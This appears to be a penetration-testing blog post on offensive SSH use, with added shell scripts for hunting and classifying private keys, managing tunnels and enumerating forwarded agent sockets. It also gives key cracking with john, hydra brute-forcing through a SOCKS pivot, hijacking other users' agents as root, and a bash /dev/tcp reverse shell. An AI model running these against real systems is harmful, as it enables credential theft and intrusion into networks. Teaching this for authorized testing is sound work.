Mastering SSH: Keys, Tunnels, and Pivoting
SSH (Secure Shell) is a foundational protocol for managing and accessing remote systems. For pentesters, it’s not just about logging in — it’s a powerful tool for pivoting, tunneling, and stealthy movement across networks.
This post covers everything you need to know about SSH during an engagement: finding keys, using them, cracking them, port forwarding, SOCKS proxies, and agent tricks.
What Is SSH?
SSH allows secure remote access to systems using encrypted communication. By default, it runs on port 22, but that can vary. SSH supports:
- Password-based login
- Public/private key authentication
- File transfer (via SCP, SFTP)
- Port forwarding (for tunneling)
Using SSH: The Basics
Login with a password:
ssh user@192.168.1.100
Specify a port:
ssh -p 2222 user@192.168.1.100
Login with a private key:
ssh -i id_rsa user@192.168.1.100
Disable strict host key checking (useful for scripting against many hosts; note that this also throws away SSH's protection against a man-in-the-middle, so only use it where that risk is acceptable):
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null user@target
Finding SSH Keys on a Target
If you compromise a Linux system, check for SSH keys:
find /home -name "id_rsa"
Common key locations:
/home/*/.ssh/id_rsa (also id_ed25519, id_ecdsa, id_dsa, or any name referenced by IdentityFile in ~/.ssh/config)
/home/*/.ssh/authorized_keys (which public keys may log in as this user; if you can write to it, you can add your own)
/home/*/.ssh/known_hosts (where this user has connected before, i.e. your next targets; entries are hashed if HashKnownHosts is set)
/root/.ssh/id_rsa
Check for readable private keys with:
find / \( -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" \) -readable 2>/dev/null
(-readable is a GNU find option; elsewhere, test each hit with head instead.)
Keys can also be found in:
- Git repos (.git, config, .ssh)
- Backup files (.bak, .tar.gz)
- Slack messages, configuration scripts, emails
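Searching by the filename id_rsa misses id_ed25519, renamed keys and keys sitting in backups. The script below is an added example, not part of the original post: it hunts for keys by their header instead, and tells you which ones are passphrase-protected (and so need cracking) by reading the PEM Proc-Type line or, for the newer OpenSSH format, decoding the blob and looking for the bcrypt KDF name. It assumes GNU grep/sed/find and coreutils base64; the sample tree it builds is constructed for the demonstration and contains no real key material.

```shell
#!/bin/sh
# Added example (not from the original post): hunt SSH private keys by content
# and classify them. Assumes GNU grep/sed and coreutils base64/stat.

# Print every readable text file under the given roots that contains a
# private-key header. Catches id_ed25519, renamed keys, keys in backups, etc.
find_private_keys() {
    for root in "$@"; do
        [ -d "$root" ] || continue
        grep -rIl --exclude-dir=proc --exclude-dir=sys \
            -e '-----BEGIN [A-Z ]*PRIVATE KEY-----' "$root" 2>/dev/null || true
    done
}

# Classify one key file: pem-encrypted, openssh-encrypted or plaintext.
key_encryption() {
    # Old PEM keys announce a passphrase in a header line.
    if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        echo pem-encrypted
        return
    fi
    # openssh-key-v1 files do not: ciphername ("none" or e.g. "aes256-ctr") and
    # kdfname ("none" or "bcrypt") sit inside the base64 blob, so decode and look.
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1" &&
       sed -n '/^-----BEGIN/,/^-----END/{/^-----/d;p;}' "$1" |
           base64 -d 2>/dev/null | grep -aq bcrypt; then
        echo openssh-encrypted
        return
    fi
    echo plaintext
}

# One line per key: <encryption> <owner> <path>, tab separated.
hunt_report() {
    find_private_keys "$@" | while IFS= read -r f; do
        printf '%s\t%s\t%s\n' "$(key_encryption "$f")" \
            "$(stat -c %U "$f" 2>/dev/null || echo '?')" "$f"
    done
}

# Constructed sample tree standing in for /home on a compromised box.
# Bodies are filler; only the headers and the two format markers matter.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/alice/.ssh" "$d/bob/.ssh" "$d/bob/backup"
    # PEM RSA key with a passphrase
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
        'DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF' '' \
        'MIIEowIBAAKCAQEAfiller' '-----END RSA PRIVATE KEY-----' > "$d/alice/.ssh/id_rsa"
    # openssh-key-v1 key with no passphrase: ciphername and kdfname are "none"
    { printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----'
      printf 'openssh-key-v1\000\000\000\000\004none\000\000\000\004none' | base64
      printf '%s\n' '-----END OPENSSH PRIVATE KEY-----'; } > "$d/bob/.ssh/deploy_key"
    # openssh-key-v1 key with a passphrase (aes256-ctr + bcrypt), left in a backup
    { printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----'
      printf 'openssh-key-v1\000\000\000\000\012aes256-ctr\000\000\000\006bcrypt' | base64
      printf '%s\n' '-----END OPENSSH PRIVATE KEY-----'; } > "$d/bob/backup/old_id_ed25519.bak"
    # Noise that must not be reported
    printf '%s\n' 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFiller bob@host' > "$d/bob/.ssh/id_ed25519.pub"
    printf '%s\n' 'todo: rotate keys' > "$d/bob/notes.txt"
    echo "$d"
}
```

On a real target, run hunt_report /home /root /etc /opt /var/backups and feed the encrypted hits to ssh2john; the plaintext ones are ready to use with ssh -i once you copy them out and chmod 600 them.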
Cracking Encrypted Private Keys
If the key is password-protected (old PEM keys show a Proc-Type: 4,ENCRYPTED header; keys in the newer OpenSSH format give no visible hint, but ssh2john handles both):
ssh2john id_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Keys in the OpenSSH format use a bcrypt KDF, so expect them to crack far more slowly than PEM keys. Once cracked, make the file owner-readable only (chmod 600, otherwise ssh refuses it as an unprotected private key file) and use it:
ssh -i id_rsa user@target
Port Forwarding Techniques
SSH lets you forward ports to move through firewalled environments or expose internal services.
1. Local Port Forwarding
Forward a port on your machine to a host and port that the target can reach.
ssh -L 8080:127.0.0.1:80 user@target
- Browse to http://localhost:8080 on your system
- SSH carries the connection to the target, which then connects to 127.0.0.1:80 from its own point of view
- The destination is resolved on the target, so -L 8080:10.0.0.5:80 reaches any host the target can talk to
Use case: Access internal services like web servers, MySQL, etc.
2. Remote Port Forwarding
Expose a service on your system to the target (run from your machine):
ssh -R 2222:localhost:22 user@target
- The target starts listening on port 2222 (on its loopback only, unless the server sets GatewayPorts) and forwards whatever connects there to your localhost:22
- You can now SSH back into your box from the target
Use case: Reverse access out of restricted networks
3. Dynamic Port Forwarding (SOCKS Proxy)
Turn SSH into a SOCKS proxy tunnel for pivoting.
ssh -D 1080 user@target
Now point proxychains at it: replace the default proxy entry at the end of /etc/proxychains4.conf with this line, and keep proxy_dns enabled so name lookups go through the pivot too:
socks5 127.0.0.1 1080
Use tools like:
proxychains4 nmap -sT -Pn -p22 10.10.10.50
proxychains4 ssh user@10.10.10.50
Only full TCP connections traverse a SOCKS proxy, which is why nmap needs -sT (connect scan) and -Pn (skip ICMP/ARP host discovery); SYN scans and UDP will not work through the tunnel.
Use case: Pivot through a compromised machine to access another internal subnet.
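A recurring problem with all three forwarding types is knowing whether the forward actually came up, especially on a stripped-down pivot with no ss or netstat. The helper below is an added example, not code from the original post: it runs the forwards through one detached ControlMaster connection so they can be added and torn down without new logins, makes ssh fail loudly if a bind fails, and confirms a listener by reading /proc/net/tcp directly. It assumes an OpenSSH client with ControlMaster support and a Linux /proc; the function names and the /tmp/tun-<name> socket path are this example's own choices, and the /proc/net/tcp snapshot it carries is constructed, not captured from a real host.

```shell
#!/bin/sh
# Added example (not from the original post): manage SSH forwards through one
# background master and verify listeners via /proc/net/tcp (Linux, OpenSSH).

# Decimal port -> the 4-digit upper-case hex used in /proc/net/tcp.
port_hex() { printf '%04X' "$1"; }

# Succeed if a TCP listener (state 0A) exists on the port. Extra arguments name
# the table files to read (defaults: /proc/net/tcp and /proc/net/tcp6).
port_listening() {
    hex=$(port_hex "$1"); shift
    [ $# -gt 0 ] || set -- /proc/net/tcp /proc/net/tcp6
    for tbl in "$@"; do
        [ -r "$tbl" ] || continue
        # $2 = local_address "HEXIP:HEXPORT", $4 = socket state
        awk -v p=":$hex" '$2 ~ (p "$") && $4 == "0A" { f = 1 } END { exit !f }' "$tbl" && return 0
    done
    return 1
}

# Start a detached master (-M) holding the given -L/-R/-D forwards.
# ExitOnForwardFailure makes ssh exit non-zero if a bind fails instead of
# silently running without it; the keepalives reap the master if the pivot dies.
tunnel_up() {
    name=$1; dest=$2; shift 2
    ssh -f -N -M -S "/tmp/tun-$name" \
        -o ExitOnForwardFailure=yes \
        -o ServerAliveInterval=30 -o ServerAliveCountMax=3 \
        "$@" "$dest"
}

# Add a forward to a running master without a new login (ssh -O forward).
tunnel_add()    { name=$1; dest=$2; shift 2; ssh -S "/tmp/tun-$name" -O forward "$@" "$dest"; }
tunnel_status() { ssh -S "/tmp/tun-$1" -O check "$2"; }
tunnel_down()   { ssh -S "/tmp/tun-$1" -O exit  "$2"; }

# Constructed /proc/net/tcp snapshot (not from a real host): a SOCKS proxy
# listening on 127.0.0.1:1080 (0438, st 0A) and an established connection
# (st 01) on port 8080 (1F90), which is not a listener.
sample_proc_tcp() {
cat <<'EOF'
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0438 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 30001 1 0000000000000000 100 0 0 10 0
   1: 0100007F:1F90 0100007F:C350 01 00000000:00000000 00:00000000 00000000  1000        0 30002 1 0000000000000000 20 4 30 10 -1
EOF
}

# Typical session (needs a real pivot, so left as comments):
#   tunnel_up pivot user@target -D 1080 -L 3306:127.0.0.1:3306
#   port_listening 1080 && echo "SOCKS proxy is up"
#   tunnel_add pivot user@target -L 3389:10.0.0.5:3389
#   tunnel_down pivot user@target
```

For a -R forward, run port_listening on the target side (for example over the same master with ssh -S /tmp/tun-pivot user@target 'cat /proc/net/tcp') since that is where the listener lives.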
SSH Agent Forwarding
If another user is logged in to the box with agent forwarding enabled, their agent is reachable through a Unix socket on this box, and you may be able to jump again without ever seeing the private key.
Check for an agent in your own session:
echo $SSH_AUTH_SOCK
As root you can also use other users' sockets, which live under /tmp/ssh-*/agent.* (export the path as SSH_AUTH_SOCK). Confirm the agent holds keys with ssh-add -l, then hop to another box, forwarding the agent again so you can hop from there as well:
ssh -A user@10.10.10.10
Use case: Pivot further when a user has SSH access with agent forwarding enabled.
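The search for usable agents can be scripted. The following is an added example, not code from the original post: it enumerates agent sockets left behind under /tmp, records who owns each, and probes them with ssh-add -l, whose exit status distinguishes an agent with keys (0) from an empty one (1) and an unreachable socket (2). It assumes Linux with OpenSSH and GNU find; the function names are this example's own. Without root you can only open sockets you own.

```shell
#!/bin/sh
# Added example (not from the original post): find forwarded-agent sockets on a
# pivot and see which ones answer with keys. Assumes Linux/OpenSSH, GNU find.

# Unix sockets that look like agent endpoints under the given directory
# (default /tmp), printed as "<owner> <path>" so you know which you can reach.
find_agent_sockets() {
    find "${1:-/tmp}" -type s -path '*/ssh-*/agent.*' -printf '%u %p\n' 2>/dev/null
}

# Probe one socket with ssh-add -l. Exit 0 = keys loaded, 1 = agent reachable
# but empty, anything else = cannot connect (or ssh-add is not installed).
probe_agent() {
    if SSH_AUTH_SOCK=$1 ssh-add -l >/dev/null 2>&1; then
        echo keys
    elif [ $? -eq 1 ]; then
        echo empty
    else
        echo unreachable
    fi
}

# "<owner> <socket> <state>" per socket; the ones marked "keys" can be
# exported as SSH_AUTH_SOCK and used with ssh -A to hop on.
agent_report() {
    find_agent_sockets "${1:-/tmp}" | while read -r owner sock; do
        printf '%s %s %s\n' "$owner" "$sock" "$(probe_agent "$sock")"
    done
}

# Once a live socket is found (comments, since it needs a real agent):
#   export SSH_AUTH_SOCK=/tmp/ssh-abc123/agent.4242
#   ssh-add -l                  # list the keys the agent will sign with
#   ssh -A user@10.10.10.10     # hop, keeping the agent reachable on the next box
```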
SSH Tunneling for Pentesters: Real Scenarios
➤ Tunnel a MySQL port (port 3306) to your localhost:
ssh -L 3306:127.0.0.1:3306 user@target
Then:
mysql -h 127.0.0.1 -P 3306 -u root -p
➤ Tunnel RDP over SSH:
ssh -L 3389:10.0.0.5:3389 user@linuxpivot
Then RDP to 127.0.0.1:3389 on your Kali machine.
➤ SOCKS proxy to pivot and brute-force:
ssh -D 9050 user@target
proxychains4 hydra -l admin -P rockyou.txt ssh://10.10.10.12
➤ Remote port forward for a reverse shell listener:
The aim is for a payload on the target to connect to 127.0.0.1:4444 and have that connection land on a listener on your box. Run from your box, a remote forward opens 4444 on the target's loopback and carries it back to you:
ssh -R 4444:127.0.0.1:4444 user@target
If the target can only reach you by SSHing outbound, run the equivalent local forward from the target instead (-L binds the listener on the host where ssh runs, -R binds it on the far end):
ssh -L 4444:127.0.0.1:4444 attacker@yourbox.com
Either way, set up the listener on your box:
nc -lvnp 4444
If the target runs a shell with bash -i >& /dev/tcp/127.0.0.1/4444 0>&1, it'll route back through the tunnel.
Bypassing Restrictions
Disable host key checking:
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null ...
SSH without a TTY:
Some restricted accounts refuse PTY requests (no-pty in authorized_keys, PermitTTY no), and scripts have no use for one. -T tells ssh not to request a pseudo-terminal at all:
ssh -T user@target
The opposite flag, -t, forces a PTY, which is what you want when a forced command or restricted shell hands you a non-interactive session and you need a usable interactive shell.
Summary Cheat Sheet
| Task | Command Example |
|---|---|
| SSH with password | ssh user@host |
| SSH with private key | ssh -i id_rsa user@host |
| Local port forward | ssh -L 8080:127.0.0.1:80 user@host |
| Remote port forward | ssh -R 2222:localhost:22 user@host |
| Dynamic SOCKS proxy | ssh -D 1080 user@host |
| Use ProxyChains | proxychains4 ssh user@internal |
| Check for SSH agent | echo $SSH_AUTH_SOCK |
| Cracking private keys | ssh2john id_rsa > hash.txt && john hash.txt |
| Find keys on system | find / -name id_rsa |
Final Thoughts
SSH is more than a way to log in — it’s a stealthy Swiss Army knife. Whether you’re tunneling ports, hopping networks, or exfiltrating data, understanding SSH at this level gives you a serious edge as a pentester.
